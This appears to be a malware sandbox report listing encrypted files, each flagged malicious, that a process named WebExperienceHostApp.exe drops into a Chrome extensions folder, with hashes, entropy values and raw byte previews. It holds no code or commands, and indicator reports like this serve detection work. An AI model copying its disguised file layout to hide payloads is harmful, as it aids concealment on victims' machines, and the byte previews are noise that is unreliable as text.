SSDEEP:	1536:oX3fRSJ+xEsiYjMjkiv2/ancWq6xFHQByrkFbMG+XUDwer4BQmxmFRq+aR:oXvx8Yjniv2/MqS7oFwGbDw/Bz
MD5:	79958A2AA153BE7B553CC2D96CD06D04
SHA1:	9EFF9E58E82B0DFE8E20807539A42D8170D92FDD
SHA-256:	D687198F3020867A65A145C59C529A75C00D8DABBC77E1CD5F97A43CD04CC0D1
SHA-512:	6F91D5B8226F8EB575BE2A0D6054F1EFC82A96D33F39F2A5EC192AB01D6431B706F4DAEF19003CDA8D2E43C2BC185A33A72AB10F944C223BC380AC6FDAF84949
Malicious:	true
Preview:	..C.+]"1......s..U^.<,N6)...w....Q..Z~..A.6.G...Z.....Z.V...?...@U\.5w.....(..y...w.y.x..l....I1...G......S..=..\.{s...3A....:...S...et.....)...).G.x..@.t.h..."...v+....P^Z..c4%R....P..O....)<.+.~.@)b.1...c.....LL."C..'....nB...o.O2....2.G.-O>(^...j..F......\"e.$^y6o.D...d...X.......~d..l.B.......K.n....VC..8.M.Xd..T<T...X%.....-E.6..}>.R..+`.........J.]....7b.^..L.(...w..u.J..'&8.Uc.v}..[g..Zy)^..j.+..G.PY.S.$..T\[l.E.u.O...E.......te.x....r.....La....G..F..h..?.}......W..2..L.\+W..<.^4bm..E..W..+......}...E.....7./k..`....u..F..E..].(.3..<D..$....A.......wQ<...`wP.l..J...H9.......{....Ob}....).......f...6...["S....+..UNU1.6..".p.1.Q.\.X....~I.uK.........r...Q.T.........".....J.>.Y!..8.....dT""..D.%d....w_.=(s._.@....w.u.7....6...f..;...T......h5g.)!...r.c<.t.......B...]..0....t..4.]..o.cuH......X......Yx=P..,=.yF."(c..n...1!..qJ..K....:;"..3p.-N....].d..........nf!.u...C..G..7.iu...I..\.....K.i.q.....OW.....Y56;E.s7..6..1.Rg.......V.@....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.35

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	78862
Entropy (8bit):	7.997909594863668
Encrypted:	true
SSDEEP:	1536:DbRSOeN5aKCd6OCQMPsjWsUtxfKxunGrYN2LZH/8yI3P6ek4xhviUf:vAOeN5aKCIOfHjWsSSxuGUNW/03K4xhp
MD5:	848E786A4E27DE29734B05E8AE9F8F43
SHA1:	AB96918CBCFFE7AC2CB56B394B6C4335D615310B
SHA-256:	50E5697EDD5442A9C525183CA029F1AF0ACF5DA8ACE34EB94E1F249E931E0399
SHA-512:	D0BB25FA9F9622E263D74CCBA895B9942A5B795F941F7A566C27A7324964CFDB41D381BB86C67E2191942EA5434E666C556CFB4CF534652918A51290D5E19E78
Malicious:	true
Preview:	i..\|.W2#.....1...L.ut.....O.]..L5......L...y....N.Ci'...6.....f...%.Y{..F....]...-1.dwd.R..N..........0..ii.W_R..`..v=ML..e.....D...%Fn....zF}..N...z..].I..I."..`...s..[...F.._Z....O...lA`.3.\|...G..M.8.........`.R..7.tF.....u&K[&.[W.t..l..&..f.Hw.c.-..p.....{.d..Q7(...-_.....h....m..7.#.I.r9.mJ...,.Q..... q9..$.29g..(..F....pt:j......."<.r.j...+C.I..;.(..J\|....}...)!..Ir."q..Ia..G+x.kY..qQEl...yW@M..q....r.y..,.u.H....j#.C...8C.....M..}...R..JQ=bf..?..X.._.A.Eg.2@Q,..eM.....d....~.q...."0....#.."..q.T..,...0#...dR9F..wE..=o".wJ..n..9.....C.J.U..G-B8.....c....$....E.O=N......c.u]!..C+SS.}/..h.A....W.8I.....=..@;.....y.t.......!....I.F....'.IT-$..s.qe..tl.....`]T....f../L.Sk.;.U..`.}......b\|..}.X.h.R.^P..D}-..B2.L.......fV^...9..!9.x....bW..8..p.\...:.Fd53.&........z.....;!..Y9..`.}..In..4.$.H........u]...cx.a.........'.Qk}..f..3......9q..xT.^D....?.nEo..;.hD).jb5j.......]Yw+...!....T.t..&Z.s18.P@.c.....P..m\|G.9.s.6.C.f.VJ.9

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.36

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	70735
Entropy (8bit):	7.997547189908903
Encrypted:	true
SSDEEP:	1536:8IG9B9COoGYLSHsY+QOnHOWDtd1FAh7+Gh8nBkC8UPWtrE0/8IMD/gX:8b9B9Cx6sY+nnhDbvi7+GynKUP2E0/8A
MD5:	8111587F6EEF94E20D82D1D47A75D2C0
SHA1:	612AE912416FD2951C60F275B51E9659905F3631
SHA-256:	EABBBDF537AD123B3B958D49CC36F4ACEB7E107BA15A0BA249117678C9172D5B
SHA-512:	F1C14F9465E445D23CCA83B81EA454D6BD8DE0B0F63A148B3308EFA671776A769B5E6E20D59D94A93B632EF4EAD5AEF9A63DDA2FE4FD6F39D5E1C40E52024FC4
Malicious:	true
Preview:	v... .~..%...K/6.....j...c..f.!...;.!..zG...W....@...L#-..=i]r9.$.W."ZK2.,....5nnT......Yz...G.3....F=.v.4....:..T.....r....D....g:.U.9.k.._....N8....}..q..8.cX..&...3.V;....gx.k.$&}..<..T6...c.aO.).auJ..#B..... T..kv..+...7.&.Sby..[n..qS.[.]...Q.:.pn.\_o0..oX....8\|...z.o&......W4x.....M.E\|q.ey#w..P.jZ.2..y'.....m2..!.!..q(>^.@...6.Q...z... .o."..]J8_......u..7.....O.&.m.nEP5.....h.~...`.4.S..K. T../I&..Td.5.".M%.k.rl.'.C...e.H...D.E..gy...'.....}n..).'.LsP....V.r...0.\|...a..l2SC./}.?..J...^&F...\......M..9l...VG=....w.}e{. ...g..wu.=r.j..xh[.:U~\|m.4.[..Qt....%.}.^.g..Q.m........e}S..nz`;u...~0g.m..k.$..C...\|U..].'7.{...Y.~........3\...\|......WP.c.0...-E8..>'.#..>...t.....4....Wz&..3.N.[.o.;.../}.9...t7>CY...q.s~.a=D.Z1.R..Uc..]\. ...>@..Tk.i.I)P...............]..V.....CF x 1X.C...l}...1.t.M.".L.....{.e...`..i.zJr[.q...U....v....j5..~F\|.....3.:ND.F.,..d......~.+.w...a7.j..:./.. hb..k.[.7.b.f.({..o..mA%M?!..F..;.*P.S.pu..>...Qw}K...v9...I(.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.37

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	78877
Entropy (8bit):	7.997709985507824
Encrypted:	true
SSDEEP:	1536:iY4KGMa7JrAdhz3kb92cF7ASmDmF+dUc6o5FiVgSsTA1gHTucfLAjP1:iY4COlWhK2cF7Fzc6ClLAij0jP1
MD5:	9E6D44AF2442BC09A2022E324A1D0771
SHA1:	E83A1D96B00321391909D1BA40641CF37E969305
SHA-256:	6A5450B25E4079698FD7B79530D97B9C07B92648B89AC3EBC5A4C4BA5A746469
SHA-512:	6B40FD41D4661C57D95D7E715817F549E2F3C3636089BCBDD70D95C1D05FF121E00889FBEC8E3977B4B7EC3FF3DB51BF5B56B5F87A75425C33A8F08502961010
Malicious:	true
Preview:	......p...;...I.Q.+m.U..qG.......p..u..-%..qhy%..l.....(..~..>.N.../..:.s..\.WV.<..v9.....y.0..7.../..........)....>YeS0...a=....3......H...........y.dFa-..x....-..r.[.H..........V.VX..E..$.......Y).)^A...BR'....R.M..............iZ...,. ^+....._..C..P.mT.\|...~^..v.n.8d.q..uY...{..FF..O.vC+.......8(.......D..%.......np<...s[....Q.&.;.u.PX.+.a..Rv..E..(.T......c...$...u ..hw:.1v.R....p~..R...f#E..Q.......c.w...+.VB.]hC.\|A....U..I.E..`...jX.H7.$....<(NX..s."#9.S.zc.....v.g..}....Q&M9...U....R.p1..fw....4d....R_.x\|.{..O....L9.l7........Di@.z.}..^........XY...`l9q..UI..:.pT.....q..@..3....T8.N.J...D..r....iT..xf.k.s.8.6...r...G.dq.R...[pg.J.p^......)..y7v{...f...Wo.?./...A..]..O../.....,...5.4>......Nj...b.G..B*.... i.}.....{4....@G.n.T..zk.S.).9....$....=.... ....@%........xG.m...J......k.....zv.\|....k..=.4..v..L5<zT....\.'..;..R.I....n&.......X`...2}.i...P)......j...>...O...^...Z,..!R.GSd....bM.5\..fL`..7.........[xl..I;..f..u1..b%.\\|Os....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.38

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	61544
Entropy (8bit):	7.997153408462792
Encrypted:	true
SSDEEP:	1536:HvZHrrQ8N31kOajJXni8rr9QMd8acnTQO2B+eFcD2UbXnGy1W2k:NsWkOajs8neMd8vQl0bXnX8H
MD5:	3650FB76AE4CFF4726E8872B93E2C12C
SHA1:	A3A65CC647B6AACE541A8EE594A448630970C8DA
SHA-256:	206071ECD6E7E8EE9D1EF4AD076A7CC494EA9B3ADD7A19F7722AF5552FCBB8C6
SHA-512:	9FB164BC611053DEA149D80AC650540440B7BC96E089B097CC01E9CA4F5A63C28D7D795A1305BB0CDBFA3720C446FA4F2B8AAB5296D2B1A14CD9FC8B9F3DDD42
Malicious:	true
Preview:	.\sX.].i.<.w..s..m"O$=.]......!...~..T-8..0.%..I....&........R<.........h@u..+8..?..W..Z(.zx=X...j\(.pn.0..M._x...M`.g..JN.d)..p......fn......+...9-P.....5.6C9....e....6....$.......P.z....r..E...W4....+.N;....f......._f..r\|l1;.+.%..".s.....H..N.\|.a..&.4=......V.I...`ZP.Se.....(..z......z ...t..~;.>Y...X..J....Lo;..^..t../[q.P....Q7....~....Z..1.k../....T.....lt.A=$@.@#D...z[.....9.y..h........I....#.....M@..x..1..y+f...47^......\|7.D...G..b.A1<.c3Q+l.no5_1}q._.!...H...o.(....:.:P.V..s.W.Md\.B.j...?....9..`=.......j9/.....D.G]..^5.,.......P&..iQS_\|.v..1}.:H.ry......3.........+.....h.Y..../..t~..m..!.`}.........@.F... ......L..M.z.?.z...mld.&......+7...u..cB...I@R...... .Q..!..Yd=..R.[.C..H...<..,...d..).1..O...^..]+.H.:u.(..7.z....N.l.X....b......%..#X[9.^....{..[.....,.....8.......v.u.FuT...D)c...W.s..d........Ri\|O.....)[K..........H?.....p/r.w.@..H.K.8.h.........v.........(.Y....L...vo.{........@...=6.)..].R......tr.........Z

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.39

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	70903
Entropy (8bit):	7.997762273448134
Encrypted:	true
SSDEEP:	1536:FoW7zuh08nXqwxjbFHE/R8BxRKYTp1+pK5K:qySh0yXqqRku3RmK5K
MD5:	3ADA0033CB145EA5F21FA500D7C0892E
SHA1:	4F708D1E86AD0E17724120C2173E63CA116E0F08
SHA-256:	837B9E02155A6E0050D32A7CFEA718A0EFAC9BE1438AE27963EED22FB73020C5
SHA-512:	72739AD51B300C0C79464211A967168291CA802A46697C64EC87DC2A4955935D9D513CFC6A2D2C861FE09A761D14282E05746639A777A7682ED5552167B9222E
Malicious:	true
Preview:	..X......8....y.!.j......h...m..u......;K.<..<P...+..F..`....pt.q.JP}....j.:. ......E7.!...{.W;W.T.:'.;....c.]U[J.&..b...n5.E..g....1....0.....+...n.,..l..4...r].>.uWR....T.,............v.m.GB.+hY0&tEHG.w.....+++z.8.....m+B#.pk.U..."..$..3.1. .......4....8,.>.$OJ>....'DoL......v..>..w...j..o1..d. ;.8.m..;k.5...J.qLH...5.)...DF).....~......r..}G..5%..........q9...@,..\|..m.t1.p...`cu..#t.#.x.XE.N&..aF..X.....?...@.G.t.....<.n>1.*X.KA.....-...).y..r+...D.G...U.1...C.I..[.[.Q..[.O.,.M.3.....:.....K;>.?..s.~......O.S.v..?c...ef....,....@........r.M...:.0....b.ut....P.4j..&.D..dg}..Bb.&..tA..ip.:.VM6~..`'\.#....O.U.nm...p...c[h.).6..g.i............[...T..J\|.D...f.....$....."wrd...C.mB....#\|.l..B.Z..-pU..2C...#.1P.K..yOC..ms{^.m0..`x..W.....r..\|.g..;........M\|}O../[...H~jT..M0Mpc.LY.N.].....0.....Q..2..#6./........I=.0C..h...]....<.+...W.CB.....X.........^...\|........V....."..xd.......s.>K.{.........U...by.O.W;...2Z....w2....'..\9.`...].4..y.....0.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.4

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	22448
Entropy (8bit):	7.990462302661758
Encrypted:	true
SSDEEP:	384:Ioyf2fiZMsYRaMYfHXMMqASpqDHUY8XXOh9hN5cHW9YsJVS4LZg7KcTz:Ioyf2fidfHXMM5FD0Y4929zVSSZfc/
MD5:	9FEDAB7983A94C2172ED0C8AD31A4AE0
SHA1:	2344A10B0AC579D5F7C85B2F123568195CAA1129
SHA-256:	03C0316AA06175D01772C590729B5861CCAA1E534C50A04C7749FB537FFB96F2
SHA-512:	3EA7075DB556F51622029F655E13869A1E54619F1D5435C1A55A7EEE0E83EDA826A455026B1D138281697C27B02637CE2FD67F0B2E313ADEDDAD533B9DACA5D6
Malicious:	true
Preview:	.....$,.d........a_...Z..j(...mq.D+ ..h..\| ...a....v.......<...Y....7.T...R...?t..iaP.z\|^o....sL..=.Q..j.....rC..$-.l.x..<+..R"....>W.}.....p........u..h}.$..f#..Hs....E..../.#`H.\.....T.J.h......t.5qg.8{.c..-.....\......}M.....R..m...V6e...D.T...?0/..n._.2......p3......c...\|.5.G...ZV ...?.ZT7.......w.k2.>.T`._...'7......G.3$....q......0..bnn.u'..rb...!...V........&..Jy.W.F9.j9.............\..k).s...o.......(S...L.K.]..XY..'........D....J./..o.eX..@..q#..2a....1.1.....K.....n/...8hYj...<..)...2o.s,3{.[...`$P.....b....Ar.....5......{.og=....$....q..<...#.K'2.\..r....W.^.F.zS-."."..S..TPO+.s4.....W...1u...E..]...#..R.,J...0.....\|...SUE-}?m._../.r...H....I0...."0._n....{....!#..Q-.t...\|..#.iv...@.-...........X.g.Y".x...J.-...b~.S....4f...`...t.2.5P.....)V..q..]0H.G`;.M.....7F...i..`...7.W$=...$.]wT.jx..~5.....?....f.O8.W....V.........1.C.3w,...t.K.y......Y......s....l....o. g...Z.eX.R...m.D...z.......Trj`.mZ...(...+i..g.v..,...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.40

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31659
Entropy (8bit):	7.99399133173195
Encrypted:	true
SSDEEP:	768:SAbxvE64by57PDhD86oYVMkPRDUGkMYoAMp+V/zJ:SAbxvEjiHtdoYzRDUGkgAMUV
MD5:	5993A66FEC20A7F56E0F96BA6D4E1C3B
SHA1:	272995381A0540C694D74CB8EBAE95409D69884C
SHA-256:	8E16FDEB09B4ECC90704391DF62ED848A7B50395DD566F1B52C8EFDE7CDA8398
SHA-512:	E9868C86C679E38AA938CDB9EE2E9FF336F7FAF8FF6EEFD0FB1590EEA27C8D60C575BD2575992570C811E8E1D1201F44DDE6D0BD2D02952BA7EBBEF0AE4648FD
Malicious:	true
Preview:	.......D.8ou..=@f..h..3..).}.L.gq....N.....o.`]v.r1.RV..M..-P.B.5....CV.../....-....i.6..s.f0...........l"v>J...[....E.A...uC..Os............6.>......o92.u........n.l.-5..8..IO.}.<.><1....7..c...:..m.V?E?Kkkl..`@.G.=E.....t..K.$...Rc...c....:..w~...:.Yf.l..?Y....B.....D..s..\|.n....b.......@4.1."./.).......D...:..&.w...>n...=v....G..^(.\Xa.u.i.x../1....0p........c./T._h..,.@%.&....M..z..D.....c....1..bL.A?%[..o..z^o..R..p..G.A3V..\|f.5.....G..WXa...h_I...^......... ...N}X9v..HX.!w.~...r..?...\+..Qz2O,.t.H.h.9B.oF..(....?...jt.....-.c.,..a4....;.k..K..+S..Q..uD1....}w.l.............7..%..RY.~N.....1.<..s..%c.8._u.u]1#'.G.-.... ..#.....H.n=;/.q.... +.?8E),1"C....B...../.r.VX......E.3.]e;.y.Z%w.I.m......Z7YV.l..@'.6.c8S.f.T...s......h...M."......W...-..,\|<i...W.(...L.t<.G..&-.....h..a........&Ar....r....O....%T....`.b[J..,$...U.<...^QYSd......+.d..P...^.....M1.F....,....U..;..(e.C.`...m.......c..i..F-.^f.x.s.q.....4..l..b.5..(...W.u(tu

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.41

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	64474
Entropy (8bit):	7.997138619206409
Encrypted:	true
SSDEEP:	1536:DVV4ccfHGh0qSMA2PHDOK5iP8LDU8czc6k7fo:DD4cJH5iE88c9kLo
MD5:	DDF2883051F47CE475DAE1AFB23F7ABF
SHA1:	476243F58CA6B87B3282455801ACA0259AC6C723
SHA-256:	D7D2F9ACBAE11A604CD22795D5E8337512CB32577A86BA2917B8AB6388F0E052
SHA-512:	BBBB7B15EDAF56059A757020F71A3939911F049AD516D9D70E37F2EEA961D6E2267B15EA87DC87C12F45ECBCE6F01DA5BD639C3ADB4B38A0A1656227D4325574
Malicious:	true
Preview:	..gD..3.............o.E.....m..r!./#........YR..;7...im..zeN...1.C...B...\.b.......{..%'.!.g..(EL..6..tewH@..{.b"...~..y..........+C..'h.>6..S..."w....#.E_?..Z..S{...X....g..8\|..r..U.$..yy.......=.Z5..q....C'l...ub.=\d....;....x....i..~..Kgu.-.T..gs.m...$..#."0...j....N..j...Y..@.(o..I.>...8E./.y.Bs:-.mA....?......}....96..6.Y.._...K.Yl............h.O.i.V.k.Xh...I..L.......=I..qB..Wo.x....O..........t1.K,....n.?G.:......(.._.....+M...`.. .n.......p}...X...<.....G......nK}....TR...l..C.P...M...n.[4.T"...............Gt.....!M....W5Z.k.......\.7..%AX.8./S.&....>.>.2.......yw.&...B.+.$.....)..?.E#....Ay2....v.j.:.y.T...5.....[.i..G1.....N.."....V..`k@.'(L...V..B.!.RF..O%\E....... #B.....5..h..j....j.G.Ak.k.G..@.1>........>[.:.b'..........t\.u.. .....R.L.....X..!......%...%.R..DN....4.....E.9....5....Fw.$.$;.."s$?.T...C=...:.sLv.>1.....(tUR...>.8........%.4b.U.....x.X.}.^.l$....A. .n9n..Dy...... ...b.8z.....jO...X.1...I...;..ek....2.IU<*8.w...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.42

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	51995
Entropy (8bit):	7.996670553920514
Encrypted:	true
SSDEEP:	768:SB6bvf3r/Vj8XCYh+6mVu53kdL0IOV7+izG725zUc/VEcbddzACmfKG5Fdt28/b4:SEbvj6XC2RkdLEVvG72Z95Jx1oRt28z4
MD5:	D9C58337948C75B813FD2D5E82A97AA4
SHA1:	49F09C4ABA76893A1768FEA3C2A8D1B9824FB363
SHA-256:	77CF46704A7FDA09D1E918E48D3D53EB6AE7FDFBA930888393D89FB3A828B129
SHA-512:	0C954FC759A9A1D4EF86B02533378359640888DDBEE6A0A35F1E9E120CF9BB62E5DE18E876E7F9353FE140727472599BD5B89D29CD86DF8041E1F48B87EB6152
Malicious:	true
Preview:	.S.`...Z.2.A1l....\|.....QOr?......J.......1r...['.@..tI.U'(...$...y...CJ...9_.Q3k.......-./eV.d.g..\y....d.da~U-[.w)3...l...S....Sv......QU....8.a...#..^V..b..}....$D......U.p..F..^.....%..EO.....~..m'.W.{aj....' .5.C........O.G.0,."2...m.tR.)....W...#.....c.SX..v...tb.....#.q......-.....u.........tX1H@.Ee.vX.......e....O.4<..?{>.t.9.....\.......M..h...........r.....v.z_..9G.= ..'%...3/6..4.....Ts>M...\...........h...W_........A...y...4......K..bK..../......O......^sf]....]..:.{.;..q...M..;F,...]w.,....'...\..........>_n.4.....U09 \R.............@...T...'.j....x5....3gCa.......+.].az.cWW....{ =.i+.@..FTu...{....y.a'c={..<.s...2...q..lKu`7.j...Q....+.%.J...._=....\|]....-.,.*y>>.'.'..\|.'.6w.C.U.z....V.j...,Sj.7!?6.y.S.i.9..O..i...8....LS...=U=....gf.....5.4.K!....8f.i.2.Aq...R..M...h....\|..o......5..S......2..f...^._.. ..w...Y.T..u...\|0o.~.......T\|J'...^.9f ...8..<...!v.y.S.....TR0l.`..q...JV...3.....]......dFF]q.Z.~.#x...=..@k...2

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.43

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31415
Entropy (8bit):	7.994143485365186
Encrypted:	true
SSDEEP:	384:3aVW6crT4edytR/uxt3YT/hGkSAakRI/CzGGra+/8xgXBTCR+3tG6uVztEwzi6SL:3jAtR/sOaRISiAkBeR+SV5mfWuGZiBl9
MD5:	0A2118A4283B99B879E8F73A8694F099
SHA1:	A0E8FB80D27F1BF1B4C2873A3FC54523087696BF
SHA-256:	D7C32146124A7A47F00FDED62330CC22DC444282A3EBAF3CF2D2D9E0878DB6AF
SHA-512:	DFF1A29AB778540DA045280F6071C033D2CA48AE807084980A619CC369CC749C9323A8AC661BFCBE23E4C3F0ACF2F4CF29A57F816345AB398DA256C4465180CE
Malicious:	true
Preview:	a.c.>....2.GH....;_...=XL.._..Ys.....+z......._+q.../k...6.9...d.FL.e.a..<.p.%......8..../-.M.(.....Z....S.w..NJ.z.UV.@S...;.J...,..3\|......JCwk.....{.....V>N....z.I....n.H..&.L......(...gH.$.H..............>......z..E....j}.....g...`s..U..H...Jh..3...H.......A_..Rf.h_zf...;v.....29i(.W}.......\|......{...TTWb.....:..[..v:A./b~.Z6....)....=...+..A...&.'....l9K<......9S+._.9.....+?]....b1./N.2.....U.yg.\.X.R.{R}.7H.....\.......Eg.zN.d..rR..[.h,..S..2..,.K.<.J.(P%n..X..H.+VA/>M.@X..V.n.3..k....H%...&.h..U=.Fro9D.....I.z. >..F....^.A..C....3b.k.5.u......A.L...A....?2.iT.8\|.Y...>...6..~.J`.O5`T...s......B...v4......./A.........h.o.s.M~[.].,L..$*...e$}...e.$..{b~.%xx..ex....\|...t..a.f........e.h.....Zl.....;..e..6Fd..(..a.._Ku.A....z##V..~.-.pn......P..?.....O................U..j:PC.o...dZ.....hp^..4"y..M1..B..-N.vs..p...V.'{;(.\..vL3..h.....\;....Y......WC.._..s...S..$..+..'..k..r.8w......4).<k.;vX.........B..u.......MeH'.....6\S.L..;{.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.44

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99465
Entropy (8bit):	7.997818312765196
Encrypted:	true
SSDEEP:	3072:HP8joB8XiAYDPBF36R/9QQH/JtitZP+Cq4h1tRk:qiAYzBF36JlfJtidq2O
MD5:	095AE6EA21AE2A12BCD1A2359C3D78F1
SHA1:	143DA0B8E4BDB4377381A141FE4720FDE7D81B3B
SHA-256:	FC38B2DC72B0EE8181827210581CC4A560AE4A984CAFB91910EE80658841B0E0
SHA-512:	8C033C5D637EF289DBF28CFAC97DB9961ABEA6469054BC0A2864DE4FFC68765C801ED678CB3A955FD6313AA185FC98FB52BF41D62B10605B2EE2079130467DD2
Malicious:	true
Preview:	.6. ?.!...........a_;.[.,.dc.......j...xc..}...(.....5..b...F.v.He..]...".>;.'...N'R...x..L.T..QTr..G.Z....~.%M.....`...t.......E......u....QR.l...mU.H.z..p.a.j]uH.z...o.D...k=...$J.i....O.1..x..n:4RFiqg..q........P.Q...N...k.<.......K.....v......N.h8.@I....#{.r..Y.'..v..[..u...G..v!.....Ss/...;.zj..p...k..y...>...~.2.W...bT.#.......;.ao8L........?..-........r-.=....J..`..^\|..o.R..=.m.5.j...D..>'.a...W....$+m...P..`.^....U.d.....UP.\S\| ..IV..u..Gl.eUz.q.....I.zT$.i.\&...r...?.F.jp.x.T9%%4pG#...c...3?y..rD...w........:5..2...Q.u+...N...'ad."..!.85../...N..:.u...i@oI.Y..>.."j"G.YZ.^...g.$.....V%y.^...{......i...... ..l(......T+.~b.v..+.S.4.Ia.~.....e.c2`.......#........G.....6.5.SF.....p:...z3\&....^....O;.VN.Kf.......m....t.![S^.......&...I.....1.L..E..\o.$.Q...:...>.o.........dG..gb,2.........9..Wbk.}z.7.......T=...Q...B..4...uE.4@eN.../..B.....:....M_......uAFn..b. S.".+.....]..>X<.{.R.@...i..it..K.`..T1..,..%j.\..K...w..`. J...b.g......U.3.<2..V.Y.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.45

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32176
Entropy (8bit):	7.9940586558098286
Encrypted:	true
SSDEEP:	768:7+HfVBVBOdmCIjLCwFT5pASdUSD1u/shaNOwPgMaaAP5hjMkXdRo:q//OdpIXCwF9WSaSDA0hg4qA3RdC
MD5:	6118044F9E275C917582D65947E8DE41
SHA1:	6C9C21D007F856100C8B81D7ABA6AE2B48C85DFB
SHA-256:	E5890EB60C87A566000D78B637DF2812C3169B9E1A8711450A4FBA6A7062299C
SHA-512:	709FE85D777CD5E8172C63632D19E033739DE1380AAD8FB3151300CA5E0450D8BA5A5DA899D7AD6622DBBBDB9BEAD0AC850275A2F833C98CE24429AED2FD2331
Malicious:	true
Preview:	wr.MK.U.}.[....=q.....^..f...[..hVc......v...t=U?DQ..3.8k..g9.D.F1.w..i..2.L...d..8)...F...5.......&;...9.l.....9...s.X7..{h/.U...\...&.....O...Th.t....N..(.....8i,z.kdS..>.G....1.q...kV....#.....nY. J..S.}`..gb.i..w.U./ .W.x..\|...(..._{...LdS+y;.....o>..`.....Q\|3.UD..:F.9.yG"_...N/~.?.......k.16.j.q..6..C9..rD.lA..=.\|t.0b..i9'...q..nE.na.S..b...3^DAS..+....<..Y2.........c+.#,....b..q?.6m.\.h}C.'..c....U.._B.^-I...9a...+.&..~..../.@.S..X...@.!.B~.JL.a.;..ev3(.....p..s$...W......pxj.....~.4..,.x..e..!... ..z..$X...SL..O8x.?.x..#A...S.....f{u............)-..Q....,.F..H_p.......K....9.....~Wy.I.H.D.e.rr.p....X.\|.z+.(...{.P..A.=......j_l..Zj...'/.....5.5f......e..}....im.X(.,.:.t..M..b.ZW..K...o..P........&..3....yHf.CS.j..8..J<g..@m[XYo......[.o..hJ"...w5..:...X.[...;.p*.B_....8...U.{..,F..>..rs..LsV.lk.gOE...M.?@@..C...&..k....]8.....g...1r_.&.....B......l.t..R.=.....5.G....[...M._.\d.......$.T$..)..q.G.I...6S......HX....P....Z.F=..i."

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.46

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91594
Entropy (8bit):	7.997720136221587
Encrypted:	true
SSDEEP:	1536:f9waA66hrRRXi6BMhXBQHKmlAwFkBNHx2Vb8j9od+DawyYVVyrx8xLYL:feVlXiqKAbF+B1Mb8jWd+NyOkVL
MD5:	0782126BBC13E20E6B8E8F32D932329D
SHA1:	393DE5EB74893A30FA81D417B1B70A9A639B86C9
SHA-256:	D3ADBCB5CC190C7E0C592F8568EE47442D84301E6F6A707E2D133D147C5F8546
SHA-512:	8CE5ED361DAD8C8FFFADE4E5490471AFBE2BB4359E137B7396FFC7E8633FAB4E05709A804BDAD9C6E1B120EB079DEFB0C1C4C44859FC28F36BE3AECE007BED21
Malicious:	true
Preview:	.'.K#tx...T..,...i.1..n..o.U.I.TNZFV.y.....?y...>q.....B1.?.".....w..f[.Q.O.....MO....A..x<q....0!..0...(....\|4.:.f.......b..d.g....}.q..?+..@sk_.....k~x...6....ml.1\|..........,.~}5..Gt.G.....L....{O..O.){.n..q&?Q.....9._c............xY}-......i..x4...8.i].l.....f..l...Q_.Z...$.Q...z...,cV..~/..t-...q.....G..&......I...~Kh}6M3Xf..#...V{W.(Hm....D.....a..>.......!.LJ9...N..-?pKJ B?..k5#....s(....0.J.!.....p...'.'.G.r",..7.....$.A....L....#NI.1ft.P.^.h...'L.....$Tz...'.._..o..].`..Y....0^@..(.....Q..H....g.n.xk..F]..(...0...Iv&...M.b..E........XD....,vI.....9F..........6..S....:.s.\Y$.N.l....0...]...^.B.0.K.l.m....'..<.Y.......+m^i.).&c..{..g..;.J.v...2..3%.YH...-..A.'..U..R....(.......Yh....K.....$....cUzX....d?...@C...g...4.O[....2w..s....(..4...![;... j..]y..S....]H;..V=.&../. .G.E..t...`N.Ld.=.am,..[.`9.M.?Q...54.4..80z.8x..[.I..p.W...]`0...d.}UEW..TU...E.E..+.m*.....`....+..I8.u..;..:.s[..E.}.p.p..(.5<!<..Gs.W.7.cU...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.47

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90749
Entropy (8bit):	7.997795978977805
Encrypted:	true
SSDEEP:	1536:1rAtLGb8lc6Pzleb+2+vrai4ZGflYFc+eCDlT7SmnRrTEW4hYTO2laXjYqa8ixUl:ZAYbslPUKBvjFflYmBelCQlf4hN1TBMK
MD5:	DD3E861F95F80AFFA6238F8BA390E73F
